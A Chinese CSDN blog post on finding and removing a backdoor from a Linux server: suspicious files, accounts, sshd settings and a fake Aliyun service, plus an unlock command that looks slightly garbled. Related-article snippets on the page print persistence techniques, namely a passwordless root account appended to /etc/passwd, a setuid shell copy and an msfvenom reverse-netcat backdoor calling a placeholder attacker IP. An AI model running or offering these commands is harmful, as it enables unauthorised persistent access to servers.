记录一次linux服务器被留后门如何清退

最新推荐文章于 2024-06-14 13:37:46 发布
最新推荐文章于 2024-06-14 13:37:46 发布
阅读量918 收藏 10
点赞数 7
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_14926283/article/details/138645551
版权

怎么确定自己的服务器有后门

第一个确定服务存在后门的情况有很多种

  1. 可以在网上安装一些免费开源的病毒查杀软件
  2. 有一个正常的服务器,进行敏感文件对比,当然这里也有一些不落地木马
  3. 服务器莫名占用虚高
  4. 使用top、ps、htop来监控可以进程
  5. 采用端口扫描的情况,探测异常开放的端口,如nmap,openVAS什么的,也可以使用命令查询
  6. 安全日志分析,一般这些日志会被清理

怎么确定是可疑文件

  1. 使用反病毒软件扫描文件
  2. 文件权限过宽,被莫名锁定
  3. 对比文件hash值,hash值不正确千万别着急删除,有可能是你的系统文件被感染木马的文件置换
  4. 文件执行可疑指令,如反弹连接,定时任务,下载或访问不正常的文件或者地址等等
  5. 文件修改时间,创建时间是否异常,这个很重要
  6. 文件存在位置异常
  7. 人工查看,有些木马未经编译,特征明显,完全可以使用第一个方法来扫描

怎么清退

最直接一点的,如果不涉及数据存储,完全可以创建系统快照,一键还原到未感染之前的状态

当然如果有必定条件不能还原,情况有多种这里就不一一列举了

找了一台服务器举例

全程采用人工的方式清退,这里只做清退,漏洞修补就不说了哈

服务有一段时间的内存虚高,而且莫名增加了一些文件,确定已中木马

肉眼观察

在临时文件中存在莫名文件

打开看了一下,确定是非系统文件直接删除

crontab -l

查看是否有可以任务

发现并没有

那看看系统文件

首先得看看/etc这个文件夹里面,这里面存在几乎都是一些敏感文件

vim /etc/passwd

 查看是否存在后门用户,当然也有系统自行创建的一堆,不全是自己真正创建的账户,注意查询除root之外的权限超高的用户,一般服务器被入侵,都会想办法提权,然后创建后门用户

如果存在可以用户,不用犹豫直接删除,注意有些软件安装会存在自定创建用户的情况,怕删除错误可以做好备份

vim /etc/ssh/sshd_config

这个文件有时候会被改写,加入一些乱七八糟的语句

如  

AllowUsers *

 通过改写这个文件达到其它用户远程登录的情况

重点关注这个文件的修改时间

这两个文件清理后,我们再看看系统开启了哪些服务

systemctl list-unit-files

发现可以进程,这个查询了一下,貌似是伪装阿里云盾的可疑进程,咱们做好标记

再看看

pstree -up

发现他跑的很欢快,哈哈

三步骤 先停--》再删--》后重启

 sudo systemctl disable A_li_yun_Duns.service

 上面标注好了位置,和截图上的位置分析,去相应的位置删除文件

咱们直接删除

当然较小的文件,咱们看看尝试能不能编辑,有的时候编辑可以发现很多我们没找到的可疑文件

接着找找

有一个被锁定的文件,可疑不正常,编辑试试

咱们直接访问这个页面

这个网站是什么,咱们后续研究

删除这个文件提示权限不够,这是正常的,文件被锁定了

 chattr -d -i 0

先解锁,然后再删除,就ok了

 这应该是被清理过不彻底,新旧木马一起存在,咱们清理一下,重启

斗码士
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Linux服务器各种后门查杀
有勇气的牛排博客
03-22 7267
hack再攻击我方服务器的时候,一般都会选择使用kali中的各种扫描工具,或其他自动脚本,对所有路由扫描排查,尤其是 /admin之类的敏感路由,当然大规模扫描也容易在日志中分析出来,访问量统计会非常明显,个人在接触网络安全后,发现很多脚本喜欢扫描php后台项目部署后,如果不是因为基础错误而崩溃的话,往往是被人大规模扫描了。
服务器被放入后门文件,服务器被***了怎么办 rkhunter的简单安装及检测后门
weixin_33545930的博客
08-12 682
被***了,查看了下/var/log/messages和last都已经清理。sshd : * : spawn /bin/echo %c %d | mail -s '标题'邮箱地址 ---》邮件来报警一、接着查看 host.allow里面设置,禁止某个可疑ip的访问二、用rkhunter扫下,是否存在rootkit恶意程序。鸟哥讲的rkhunterrkhunter的安装:2.配置安装To perfo...
服务器可疑安全事件 警告:发现后门(Webshell)文件网站后门 手动处理流程
06-30 5325
服务器出现了可疑安全事件:包含WEBSHELL代码的日志/图片文件 处理流程
linux 系统后门方法+日志清除
收集盒 Book box
11-28 1616
1. setuid  #cp /bin/sh /tmp/.sh  #chmod u+s /tmp/.sh  加上 suid 位到shell上,虽然很简单,但容易被发现  2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd  即给系统增加一个 id 为 0(root)的帐号,无口令。  但管理员很快就可以发现哦!  3.echo "
记录一次linux服务器被侵入攻击的现象
f2315895270的博客
11-02 3308
某天早上来的时候测试那边发消息通知后台服务用不了,然后我去检查服务是否正常启动,本来以为就只是挂了而已,结果看到了阿里云那边的警告通知,服务器已被入侵,(公司阿里云账户绑定手机邮箱都不是我,所以没办法在第一时间收到通知),然后去检查服务器cpu等情况,一看占用满了 知道可能是被攻击了,这里有一个路径为/tem/syn的程序一直把cpu给跑满了,就尝试将进行给kill掉,然后去这个目录下把syn这个木马文件给删除掉,结果删掉了之后过了一会他又恢复了并且启动,这下就有点不知所措了,知道应该是还后门自动的
怎么查找Linux服务器是否有后门账户
网站安全专家
11-15 1175
依据我们SINE安全15年的安全从业经验来看,检查Linux服务器里是否被植入隐藏的系统账户后门,可以编辑一下/etc/passwd文件中的新增的潜藏用户,还可以利用awk命令,查询uid=0以及uid>=500的所有用户名,如下图的指令就可以查询是否有异常的后门账户,还可以查看Linux 账户的登录历史记录,以及登录的IP来看下,是否有异常的账号和IP登录过服务器。还可以将SINE账户写到Linux 里的/etc/passwd文件,VI编辑以后,通过passwd命令,设置SINE账户的密码。
【我Linux服务器被ddos了】记一次ddos防御+溯源+反击
qq_35581156的博客
03-15 3694
打比方说 被攻击方是你开的一家包子铺,正常的情况下无外乎就是客户来到你的包子铺,他给你钱你给他包子,这就可以看做是一次正常的服务器请求; 然后攻击方,也就是你隔壁也开了家包子铺,他的店铺没有人,羡慕嫉妒你门店里面客户很多,于是你隔壁家包子铺就花钱雇来一堆人去你的包子铺里面排队,只排队不买包子,扰乱你正常客户的买包子速度(因为要排队),这就是DDOS攻击;
Linux服务器被入侵后的排查思路(应急响应思路)
人若有志,就不会在半坡停止。
11-12 1903
黑客在9月6日14:31:39——14:33:11对服务器进行爆破,且在 14:33:09成功爆破出root账户密码并且进行登录,登录之后在9月6日14:37:22 植入了 .shell.elf 后门(根据成功爆破出root账户的时间可知 9月5日18:00:06 为 .shell.elf后门的创建时间,并非植入时间)、在14:38:00 植入了 /.centos_core.elf 后门、在 14:43:31 植入了ps命令后门、在 14:48:08写了恶意定时任务,恶意IP为192.168.1.132。
linux系统后门方法+日志清除.txt
01-09
Linux系统安全学习
webshell下LINUX提权+后门.txt
01-09
Linux系统安全学习
简单的Linux查找后门思路和shell脚本分享
09-15
主要介绍了简单的Linux查找后门思路和shell脚本分享,本文的方法相对简单,提了一个思路和简单的Shell实现脚本,需要的朋友可以参考下
25000Linux集群+去后门补丁+vc补丁
08-02
测试了确实是正版25000的主控和Linux小马当然也带后门 生成器上面带的后门域名无法直接去掉 通过运行内存补丁生成小马可以直接0填充掉后门地址 SS无法查到连接,域名解析到127.0.0.1的 只有等到解析到IP地址的时候...
一次真实的应急响应案例(Centos)——暴力破解、替换ps命令、多个后门对应的应急响应靶场
03-10
暴力破解、替换ps命令、多个houmen-应急响应靶场,应急响应教程:https://blog.csdn.net/weixin_40412037/article/details/123323981?spm=1001.2014.3001.5501
nc网络收发测试-tcp客户端\TCP服务器\UDP\UDP广播
06-14 258
nc网络收发测试-tcp客户端
百度网盘限速解决办法
生活在别处
06-13 2031
比如可以获取下载直链后,使用IDM(Internet Download Manager)对该直链进行多线程下载,但是并不会有实际速率提升效果,因为百度网盘在服务器端进行了限速,多线程的速率总和被限制在了100KB/s左右。(现在虽然是所谓玩游戏获得会员下载体验,实际上点击后会在百度网盘内打开一个web游戏,并不需要游玩游戏,直接等待会员下载体验时间结束即可关闭web游戏窗口)所以,客户端这些改动伎俩通通没有实际效果,即使在客户端显示无限速、显示会员体验,都只是自欺欺人而已。
ASP 应用程序
csbysj2020的博客
06-09 359
ASP(Active Server Pages)是一种由微软开发的服务器端脚本环境,用于动态网页的创建。ASP允许开发者使用多种脚本语言,如VBScript或JScript,来创建交互式的网页。这些网页可以与数据库交互,处理表单数据,以及执行其他服务器端任务。ASP应用程序通常运行在Windows服务器上,并需要IIS(Internet Information Services)作为其Web服务器
计算机网络(6) ICMP协议
最新发布
qq_42761215的博客
06-14 334
ICMP是网络通信中不可或缺的协议,虽然不传输用户数据,但在网络管理和诊断中起着重要作用。理解ICMP及其各种消息类型对于网络管理员和工程师来说是至关重要的,它有助于维护网络的正常运行和性能优化。
kali linux权限维持,权限维持篇-NC后门
06-02
在Kali Linux中,权限维持是一个重要的主题,因为攻击者通常会尝试在被攻击的系统上维持其访问权限。其中一个方法是使用NC后门。 NC后门是一种基于Netcat的后门,它允许攻击者在被攻击系统上远程执行命令。以下是在Kali Linux中创建NC后门的步骤: 1. 在Kali Linux中打开终端,并输入以下命令来生成一个反向Shell: ``` msfvenom -p cmd/unix/reverse_netcat lhost=<攻击者IP> lport=<攻击者端口> -f raw > nc_backdoor ``` 2. 接下来,使用以下命令将生成的反向Shell作为后门上传到受攻击系统: ``` nc -nv <受攻击系统IP> <受攻击系统端口> < nc_backdoor ``` 3. 等待受攻击系统连接到攻击者的系统,然后使用以下命令打开一个监听器: ``` nc -nlvp <攻击者端口> ``` 4. 当受攻击系统连接到攻击者的系统时,攻击者将获得一个Shell,可以在其中执行任意命令。 请注意,NC后门只是权限维持的一种方法,攻击者可能会使用其他技术来维持其访问权限,因此在Kali Linux中学习权限维持是至关重要的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斗码士

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值